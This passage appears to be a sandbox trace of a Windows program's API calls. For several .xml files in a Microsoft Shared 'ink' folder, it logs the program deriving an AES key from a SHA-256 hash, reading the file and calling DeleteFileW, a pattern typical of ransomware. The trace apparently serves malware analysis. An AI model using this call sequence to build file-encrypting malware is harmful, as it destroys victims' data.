lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0138.760] CryptDestroyHash (hHash=0x284d568) returned 1 [0138.760] CryptDestroyKey (hKey=0x284d628) returned 1 [0138.760] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.761] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml")) returned 0 [0138.761] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0138.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ipsita.xml", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipsita.xml", lpUsedDefaultChar=0x0) returned 11 [0138.762] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0138.763] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0138.763] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0138.763] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0138.763] GetFileSize (in: hFile=0x40c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x9de [0138.763] ReadFile (in: hFile=0x40c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0138.765] CryptDestroyHash (hHash=0x284d668) returned 1 [0138.765] CryptDestroyKey (hKey=0x284d628) returned 1 [0138.765] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.766] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml")) returned 0 [0138.766] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0138.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ipsjpn.xml", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipsjpn.xml", lpUsedDefaultChar=0x0) returned 11 [0138.767] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0138.767] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0138.767] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0138.767] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0138.767] GetFileSize (in: hFile=0x410, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x9da [0138.767] ReadFile (in: hFile=0x410, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0138.769] CryptDestroyHash (hHash=0x284d568) returned 1 [0138.769] CryptDestroyKey (hKey=0x284d628) returned 1 [0138.769] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.770] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsjpn.xml")) returned 0 [0138.771] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0138.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ipskor.xml", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipskor.xml", lpUsedDefaultChar=0x0) returned 11 [0138.772] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0138.772] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0138.772] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0138.772] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0138.772] GetFileSize (in: hFile=0x40c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa08 [0138.772] ReadFile (in: hFile=0x40c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0138.774] CryptDestroyHash (hHash=0x284d668) returned 1 [0138.774] CryptDestroyKey (hKey=0x284d628) returned 1 [0138.774] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.776] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipskor.xml")) returned 0 [0138.776] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0138.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="IpsMigrationPlugin.dll", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IpsMigrationPlugin.dll", lpUsedDefaultChar=0x0) returned 23 [0138.776] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0138.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ipsnld.xml", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipsnld.xml", lpUsedDefaultChar=0x0) returned 11 [0138.776] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0138.777] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0138.777] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0138.777] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0138.777] GetFileSize (in: hFile=0x410, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa42 [0138.777] ReadFile (in: hFile=0x410, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0138.779] CryptDestroyHash (hHash=0x284d568) returned 1 [0138.779] CryptDestroyKey (hKey=0x284d628) returned 1 [0138.779] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.780] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml")) returned 0 [0138.780] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0138.780] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ipsnor.xml", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipsnor.xml", lpUsedDefaultChar=0x0) returned 11 [0138.781] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0138.782] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0138.782] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0138.782] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0138.782] GetFileSize (in: hFile=0x40c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa14 [0138.782] ReadFile (in: hFile=0x40c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0138.784] CryptDestroyHash (hHash=0x284d668) returned 1 [0138.784] CryptDestroyKey (hKey=0x284d628) returned 1 [0138.784] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.785] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml")) returned 0 [0138.785] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0138.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ipsplk.xml", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipsplk.xml", lpUsedDefaultChar=0x0) returned 11 [0138.786] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0138.787] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0138.787] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0138.787] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0138.787] GetFileSize (in: hFile=0x410, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa28 [0138.787] ReadFile (in: hFile=0x410, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0138.789] CryptDestroyHash (hHash=0x284d568) returned 1 [0138.789] CryptDestroyKey (hKey=0x284d628) returned 1 [0138.789] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.791] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml")) returned 0 [0138.791] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0138.791] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="IpsPlugin.dll", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IpsPlugin.dll", lpUsedDefaultChar=0x0) returned 14 [0138.791] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0138.791] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ipsptb.xml", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipsptb.xml", lpUsedDefaultChar=0x0) returned 11 [0138.791] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0138.792] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0138.792] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0138.792] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0138.792] GetFileSize (in: hFile=0x40c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x8c6 [0138.792] ReadFile (in: hFile=0x40c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0138.844] CryptDestroyHash (hHash=0x284d668) returned 1 [0138.844] CryptDestroyKey (hKey=0x284d628) returned 1 [0138.844] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.846] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml")) returned 0 [0138.846] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0138.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ipsptg.xml", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipsptg.xml", lpUsedDefaultChar=0x0) returned 11 [0138.886] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0138.887] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0138.887] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0138.887] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0138.887] GetFileSize (in: hFile=0x410, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x8c0 [0138.887] ReadFile (in: hFile=0x410, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0138.894] CryptDestroyHash (hHash=0x284d568) returned 1 [0138.894] CryptDestroyKey (hKey=0x284d628) returned 1 [0138.894] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.896] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml")) returned 0 [0138.896] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0138.896] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ipsrom.xml", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipsrom.xml", lpUsedDefaultChar=0x0) returned 11 [0139.040] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0139.040] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0139.040] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0139.040] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0139.040] GetFileSize (in: hFile=0x40c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa54 [0139.040] ReadFile (in: hFile=0x40c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0139.043] CryptDestroyHash (hHash=0x284d668) returned 1 [0139.043] CryptDestroyKey (hKey=0x284d628) returned 1 [0139.043] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0139.044] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml")) returned 0 [0139.044] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ipsrus.xml", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipsrus.xml", lpUsedDefaultChar=0x0) returned 11 [0139.045] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0139.046] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0139.046] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0139.046] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0139.046] GetFileSize (in: hFile=0x410, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x9ee [0139.046] ReadFile (in: hFile=0x410, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0139.048] CryptDestroyHash (hHash=0x284d568) returned 1 [0139.048] CryptDestroyKey (hKey=0x284d628) returned 1 [0139.048] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0139.049] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml")) returned 0 [0139.050] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ipssrb.xml", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipssrb.xml", lpUsedDefaultChar=0x0) returned 11 [0139.050] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0139.051] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0139.051] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0139.051] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0139.051] GetFileSize (in: hFile=0x40c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa08 [0139.051] ReadFile (in: hFile=0x40c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0139.053] CryptDestroyHash (hHash=0x284d668) returned 1 [0139.053] CryptDestroyKey (hKey=0x284d628) returned 1 [0139.053] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0139.054] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml")) returned 0 [0139.055] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ipssrl.xml", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipssrl.xml", lpUsedDefaultChar=0x0) returned 11 [0139.056] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0139.056] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0139.056] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0139.056] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0139.056] GetFileSize (in: hFile=0x410, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa24 [0139.056] ReadFile (in: hFile=0x410, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0139.058] CryptDestroyHash (hHash=0x284d568) returned 1 [0139.058] CryptDestroyKey (hKey=0x284d628) returned 1 [0139.058] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0139.060] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrl.xml")) returned 0 [0139.060] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ipssve.xml", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipssve.xml", lpUsedDefaultChar=0x0) returned 11 [0139.060] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0139.061] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0139.061] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0139.061] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0139.061] GetFileSize (in: hFile=0x40c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x9d8 [0139.061] ReadFile (in: hFile=0x40c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0139.063] CryptDestroyHash (hHash=0x284d668) returned 1 [0139.063] CryptDestroyKey (hKey=0x284d628) returned 1 [0139.063] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0139.065] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssve.xml")) returned 0 [0139.065] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.065] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.065] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.065] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.065] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 16 [0139.065] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 0 [0139.066] FindClose (in: hFindFile=0x284d568 | out: hFindFile=0x284d568) returned 1 [0139.114] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.115] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.115] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.115] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.115] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 16 [0139.115] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 0 [0139.115] FindClose (in: hFindFile=0x284d568 | out: hFindFile=0x284d568) returned 1 [0139.115] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.115] 